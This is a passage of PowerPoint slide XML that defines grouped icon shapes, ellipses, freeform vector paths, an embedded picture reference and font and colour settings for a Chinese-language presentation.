          <p:cNvPr id="36" name="组合 35"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="13704847" y="4237228"/>
            <a:ext cx="479425" cy="481012"/>
            <a:chOff x="1928879" y="1944350"/>
            <a:chExt cx="1129689" cy="1129689"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="椭圆 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1928879" y="1944350"/>
              <a:ext cx="1129689" cy="1129689"/>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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑 Light"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="组合 39"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2119073" y="2251134"/>
              <a:ext cx="749300" cy="509588"/>
              <a:chOff x="3897313" y="2016126"/>
              <a:chExt cx="749300" cy="509588"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="41"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Arial"/>
                  <a:ea typeface="微软雅黑 Light"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42"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Arial"/>
                  <a:ea typeface="微软雅黑 Light"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="43"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Arial"/>
                  <a:ea typeface="微软雅黑 Light"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44"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Arial"/>
                  <a:ea typeface="微软雅黑 Light"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="45"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Arial"/>
                  <a:ea typeface="微软雅黑 Light"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="46"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Arial"/>
                  <a:ea typeface="微软雅黑 Light"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="47"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Arial"/>
                  <a:ea typeface="微软雅黑 Light"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="48"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Arial"/>
                  <a:ea typeface="微软雅黑 Light"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49"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Arial"/>
                  <a:ea typeface="微软雅黑 Light"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50"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Arial"/>
                  <a:ea typeface="微软雅黑 Light"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51"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Arial"/>
                  <a:ea typeface="微软雅黑 Light"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="组合 51"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="13704847" y="4997640"/>
            <a:ext cx="479425" cy="481013"/>
            <a:chOff x="2817516" y="1944350"/>
            <a:chExt cx="1129689" cy="1129689"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="椭圆 52"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2817516" y="1944350"/>
              <a:ext cx="1129689" cy="1129689"/>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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑 Light"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8208" name="Freeform 5"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3195035" y="2160665"/>
              <a:ext cx="444894" cy="657916"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 266092 w 316"/>
                <a:gd name="T1" fmla="*/ 22541 h 467"/>
                <a:gd name="T2" fmla="*/ 316776 w 316"/>
                <a:gd name="T3" fmla="*/ 9862 h 467"/>
                <a:gd name="T4" fmla="*/ 422368 w 316"/>
                <a:gd name="T5" fmla="*/ 73258 h 467"/>
                <a:gd name="T6" fmla="*/ 435039 w 316"/>
                <a:gd name="T7" fmla="*/ 125384 h 467"/>
                <a:gd name="T8" fmla="*/ 419552 w 316"/>
                <a:gd name="T9" fmla="*/ 147925 h 467"/>
                <a:gd name="T10" fmla="*/ 252013 w 316"/>
                <a:gd name="T11" fmla="*/ 46491 h 467"/>
                <a:gd name="T12" fmla="*/ 266092 w 316"/>
                <a:gd name="T13" fmla="*/ 22541 h 467"/>
                <a:gd name="T14" fmla="*/ 230894 w 316"/>
                <a:gd name="T15" fmla="*/ 81711 h 467"/>
                <a:gd name="T16" fmla="*/ 206960 w 316"/>
                <a:gd name="T17" fmla="*/ 119749 h 467"/>
                <a:gd name="T18" fmla="*/ 374499 w 316"/>
                <a:gd name="T19" fmla="*/ 221184 h 467"/>
                <a:gd name="T20" fmla="*/ 398434 w 316"/>
                <a:gd name="T21" fmla="*/ 183146 h 467"/>
                <a:gd name="T22" fmla="*/ 230894 w 316"/>
                <a:gd name="T23" fmla="*/ 81711 h 467"/>
                <a:gd name="T24" fmla="*/ 2816 w 316"/>
                <a:gd name="T25" fmla="*/ 628331 h 467"/>
                <a:gd name="T26" fmla="*/ 18303 w 316"/>
                <a:gd name="T27" fmla="*/ 498720 h 467"/>
                <a:gd name="T28" fmla="*/ 126710 w 316"/>
                <a:gd name="T29" fmla="*/ 564934 h 467"/>
                <a:gd name="T30" fmla="*/ 18303 w 316"/>
                <a:gd name="T31" fmla="*/ 638193 h 467"/>
                <a:gd name="T32" fmla="*/ 2816 w 316"/>
                <a:gd name="T33" fmla="*/ 628331 h 467"/>
                <a:gd name="T34" fmla="*/ 28158 w 316"/>
                <a:gd name="T35" fmla="*/ 417009 h 467"/>
                <a:gd name="T36" fmla="*/ 187250 w 316"/>
                <a:gd name="T37" fmla="*/ 153561 h 467"/>
                <a:gd name="T38" fmla="*/ 242157 w 316"/>
                <a:gd name="T39" fmla="*/ 187372 h 467"/>
                <a:gd name="T40" fmla="*/ 83066 w 316"/>
                <a:gd name="T41" fmla="*/ 450820 h 467"/>
                <a:gd name="T42" fmla="*/ 28158 w 316"/>
                <a:gd name="T43" fmla="*/ 417009 h 467"/>
                <a:gd name="T44" fmla="*/ 139381 w 316"/>
                <a:gd name="T45" fmla="*/ 484632 h 467"/>
                <a:gd name="T46" fmla="*/ 298473 w 316"/>
                <a:gd name="T47" fmla="*/ 222593 h 467"/>
                <a:gd name="T48" fmla="*/ 354789 w 316"/>
                <a:gd name="T49" fmla="*/ 256404 h 467"/>
                <a:gd name="T50" fmla="*/ 195697 w 316"/>
                <a:gd name="T51" fmla="*/ 518443 h 467"/>
                <a:gd name="T52" fmla="*/ 139381 w 316"/>
                <a:gd name="T53" fmla="*/ 484632 h 467"/>
                <a:gd name="T54" fmla="*/ 133750 w 316"/>
                <a:gd name="T55" fmla="*/ 628331 h 467"/>
                <a:gd name="T56" fmla="*/ 423776 w 316"/>
                <a:gd name="T57" fmla="*/ 628331 h 467"/>
                <a:gd name="T58" fmla="*/ 437855 w 316"/>
                <a:gd name="T59" fmla="*/ 642419 h 467"/>
                <a:gd name="T60" fmla="*/ 423776 w 316"/>
                <a:gd name="T61" fmla="*/ 657916 h 467"/>
                <a:gd name="T62" fmla="*/ 133750 w 316"/>
                <a:gd name="T63" fmla="*/ 657916 h 467"/>
                <a:gd name="T64" fmla="*/ 118263 w 316"/>
                <a:gd name="T65" fmla="*/ 642419 h 467"/>
                <a:gd name="T66" fmla="*/ 133750 w 316"/>
                <a:gd name="T67" fmla="*/ 628331 h 46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lIns="121920" tIns="60960" rIns="121920" bIns="6096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Light"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="椭圆 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEE31C6B-C7EF-F74A-85BD-5321F3C9AEF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2498154" y="1434522"/>
            <a:ext cx="2353456" cy="2398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DengXian" panose="020F0502020204030204"/>
              <a:ea typeface="DengXian" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="图片 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C3450E2-82F2-6842-8DA0-0FDDF6E01EF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2553246" y="1512099"/>
            <a:ext cx="2243271" cy="2243271"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:reflection blurRad="6350" stA="50000" endA="300" endPos="38500" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="57" name="组合 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05EC8370-5761-5940-8963-EF840F9C5D18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6308482" y="3207423"/>
            <a:ext cx="485253" cy="523220"/>
            <a:chOff x="8380413" y="3667125"/>
            <a:chExt cx="1355726" cy="1354138"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="Oval 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12BC88CD-21B1-2E4B-BAD2-E32E2D7B0494}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8380413" y="3667125"/>
              <a:ext cx="1355725" cy="1354138"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="965BA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59" name="Freeform 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DF7E28B-5EB1-0A4A-89C9-ADB746785DD9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="9734551" y="4344988"/>
              <a:ext cx="1588" cy="33338"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1"/>
                <a:gd name="T1" fmla="*/ 16 h 16"/>
                <a:gd name="T2" fmla="*/ 0 w 1"/>
                <a:gd name="T3" fmla="*/ 15 h 16"/>
                <a:gd name="T4" fmla="*/ 0 w 1"/>
                <a:gd name="T5" fmla="*/ 15 h 16"/>
                <a:gd name="T6" fmla="*/ 0 w 1"/>
                <a:gd name="T7" fmla="*/ 12 h 16"/>
                <a:gd name="T8" fmla="*/ 0 w 1"/>
                <a:gd name="T9" fmla="*/ 12 h 16"/>
                <a:gd name="T10" fmla="*/ 0 w 1"/>
                <a:gd name="T11" fmla="*/ 12 h 16"/>
                <a:gd name="T12" fmla="*/ 0 w 1"/>
                <a:gd name="T13" fmla="*/ 12 h 16"/>
                <a:gd name="T14" fmla="*/ 0 w 1"/>
                <a:gd name="T15" fmla="*/ 11 h 16"/>
                <a:gd name="T16" fmla="*/ 0 w 1"/>
                <a:gd name="T17" fmla="*/ 11 h 16"/>
                <a:gd name="T18" fmla="*/ 0 w 1"/>
                <a:gd name="T19" fmla="*/ 11 h 16"/>
                <a:gd name="T20" fmla="*/ 1 w 1"/>
                <a:gd name="T21" fmla="*/ 10 h 16"/>
                <a:gd name="T22" fmla="*/ 1 w 1"/>
                <a:gd name="T23" fmla="*/ 10 h 16"/>
                <a:gd name="T24" fmla="*/ 1 w 1"/>
                <a:gd name="T25" fmla="*/ 10 h 16"/>
                <a:gd name="T26" fmla="*/ 1 w 1"/>
                <a:gd name="T27" fmla="*/ 9 h 16"/>
                <a:gd name="T28" fmla="*/ 1 w 1"/>
                <a:gd name="T29" fmla="*/ 9 h 16"/>
                <a:gd name="T30" fmla="*/ 1 w 1"/>
                <a:gd name="T31" fmla="*/ 8 h 16"/>
                <a:gd name="T32" fmla="*/ 1 w 1"/>
                <a:gd name="T33" fmla="*/ 8 h 16"/>
                <a:gd name="T34" fmla="*/ 1 w 1"/>
                <a:gd name="T35" fmla="*/ 8 h 16"/>
                <a:gd name="T36" fmla="*/ 1 w 1"/>
                <a:gd name="T37" fmla="*/ 8 h 16"/>
                <a:gd name="T38" fmla="*/ 1 w 1"/>
                <a:gd name="T39" fmla="*/ 7 h 16"/>
                <a:gd name="T40" fmla="*/ 1 w 1"/>
                <a:gd name="T41" fmla="*/ 7 h 16"/>
                <a:gd name="T42" fmla="*/ 1 w 1"/>
                <a:gd name="T43" fmla="*/ 7 h 16"/>
                <a:gd name="T44" fmla="*/ 1 w 1"/>
                <a:gd name="T45" fmla="*/ 6 h 16"/>
                <a:gd name="T46" fmla="*/ 1 w 1"/>
                <a:gd name="T47" fmla="*/ 6 h 16"/>
                <a:gd name="T48" fmla="*/ 1 w 1"/>
                <a:gd name="T49" fmla="*/ 6 h 16"/>
                <a:gd name="T50" fmla="*/ 1 w 1"/>
                <a:gd name="T51" fmla="*/ 5 h 16"/>
                <a:gd name="T52" fmla="*/ 1 w 1"/>
                <a:gd name="T53" fmla="*/ 5 h 16"/>
                <a:gd name="T54" fmla="*/ 1 w 1"/>
                <a:gd name="T55" fmla="*/ 5 h 16"/>
                <a:gd name="T56" fmla="*/ 1 w 1"/>
                <a:gd name="T57" fmla="*/ 4 h 16"/>
                <a:gd name="T58" fmla="*/ 1 w 1"/>
                <a:gd name="T59" fmla="*/ 4 h 16"/>
                <a:gd name="T60" fmla="*/ 1 w 1"/>
                <a:gd name="T61" fmla="*/ 3 h 16"/>
                <a:gd name="T62" fmla="*/ 1 w 1"/>
                <a:gd name="T63" fmla="*/ 3 h 16"/>
                <a:gd name="T64" fmla="*/ 1 w 1"/>
                <a:gd name="T65" fmla="*/ 3 h 16"/>
                <a:gd name="T66" fmla="*/ 1 w 1"/>
                <a:gd name="T67" fmla="*/ 2 h 16"/>
                <a:gd name="T68" fmla="*/ 1 w 1"/>
                <a:gd name="T69" fmla="*/ 2 h 16"/>
                <a:gd name="T70" fmla="*/ 1 w 1"/>
                <a:gd name="T71" fmla="*/ 2 h 16"/>
                <a:gd name="T72" fmla="*/ 1 w 1"/>
                <a:gd name="T73" fmla="*/ 1 h 16"/>
                <a:gd name="T74" fmla="*/ 1 w 1"/>
                <a:gd name="T75" fmla="*/ 1 h 16"/>
                <a:gd name="T76" fmla="*/ 1 w 1"/>
                <a:gd name="T77" fmla="*/ 1 h 16"/>
                <a:gd name="T78" fmla="*/ 1 w 1"/>
                <a:gd name="T79"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 h="16">
                  <a:moveTo>
                    <a:pt x="0" y="16"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="0" y="15"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="0" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="12"/>
                    <a:pt x="0" y="12"/>
                    <a:pt x="0" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="12"/>
                    <a:pt x="0" y="12"/>
                    <a:pt x="0" y="12"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="0" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="12"/>
                    <a:pt x="0" y="12"/>
                    <a:pt x="0" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="12"/>
                    <a:pt x="0" y="12"/>
                    <a:pt x="0" y="12"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="0" y="11"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11"/>
                    <a:pt x="0" y="12"/>
                    <a:pt x="0" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="12"/>
                    <a:pt x="0" y="11"/>
                    <a:pt x="0" y="11"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="0" y="11"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11"/>
                    <a:pt x="0" y="11"/>
                    <a:pt x="0" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11"/>
                    <a:pt x="0" y="11"/>
                    <a:pt x="0" y="11"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="0" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11"/>
                    <a:pt x="0" y="11"/>
                    <a:pt x="0" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11"/>
                    <a:pt x="0" y="11"/>
                    <a:pt x="0" y="10"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="10"/>
                    <a:pt x="1" y="10"/>
                    <a:pt x="0" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="10"/>
                    <a:pt x="1" y="10"/>
                    <a:pt x="1" y="10"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="10"/>
                    <a:pt x="1" y="10"/>
                    <a:pt x="1" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="10"/>
                    <a:pt x="1" y="10"/>
                    <a:pt x="1" y="10"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="9"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="9"/>
                    <a:pt x="1" y="9"/>
                    <a:pt x="1" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="9"/>
                    <a:pt x="1" y="9"/>
                    <a:pt x="1" y="9"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="8"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="8"/>
                    <a:pt x="1" y="8"/>
                    <a:pt x="1" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="8"/>
                    <a:pt x="1" y="8"/>
                    <a:pt x="1" y="8"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="8"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="8"/>
                    <a:pt x="1" y="8"/>
                    <a:pt x="1" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="8"/>
                    <a:pt x="1" y="8"/>
                    <a:pt x="1" y="8"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="7"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="7"/>
                    <a:pt x="1" y="7"/>
                    <a:pt x="1" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="7"/>
                    <a:pt x="1" y="7"/>
                    <a:pt x="1" y="7"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="7"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="7"/>
                    <a:pt x="1" y="7"/>
                    <a:pt x="1" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="7"/>
                    <a:pt x="1" y="7"/>
                    <a:pt x="1" y="7"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="6"/>
                    <a:pt x="1" y="6"/>
                    <a:pt x="1" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="6"/>
                    <a:pt x="1" y="6"/>
                    <a:pt x="1" y="6"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="6"/>
                    <a:pt x="1" y="6"/>
                    <a:pt x="1" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="6"/>
                    <a:pt x="1" y="6"/>
                    <a:pt x="1" y="6"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="5"/>
                    <a:pt x="1" y="6"/>
                    <a:pt x="1" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="6"/>
                    <a:pt x="1" y="5"/>
                    <a:pt x="1" y="5"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="5"/>
                    <a:pt x="1" y="5"/>
                    <a:pt x="1" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="5"/>
                    <a:pt x="1" y="5"/>
                    <a:pt x="1" y="5"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="4"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="4"/>
                    <a:pt x="1" y="4"/>
                    <a:pt x="1" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="4"/>
                    <a:pt x="1" y="4"/>
                    <a:pt x="1" y="4"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="4"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="4"/>
                    <a:pt x="1" y="4"/>
                    <a:pt x="1" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="4"/>
                    <a:pt x="1" y="4"/>
                    <a:pt x="1" y="4"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="3"/>
                    <a:pt x="1" y="3"/>
                    <a:pt x="1" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="3"/>
                    <a:pt x="1" y="3"/>
                    <a:pt x="1" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="3"/>
                    <a:pt x="1" y="3"/>
                    <a:pt x="1" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="3"/>
                    <a:pt x="1" y="3"/>
                    <a:pt x="1" y="3"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2"/>
                    <a:pt x="1" y="2"/>
                    <a:pt x="1" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2"/>
                    <a:pt x="1" y="2"/>
                    <a:pt x="1" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2"/>
                    <a:pt x="1" y="2"/>
                    <a:pt x="1" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2"/>
                    <a:pt x="1" y="2"/>
                    <a:pt x="1" y="2"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1"/>
                    <a:pt x="1" y="1"/>
                    <a:pt x="1" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1"/>
                    <a:pt x="1" y="1"/>
                    <a:pt x="1" y="1"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1"/>
                    <a:pt x="1" y="1"/>
                    <a:pt x="1" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1"/>
                    <a:pt x="1" y="1"/>
                    <a:pt x="1" y="1"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="0"/>
                    <a:pt x="1" y="0"/>
                    <a:pt x="1" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="0"/>
                    <a:pt x="1" y="0"/>
                    <a:pt x="1" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="D9E3DB"/>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60" name="Freeform 10">
              <a:extLst>
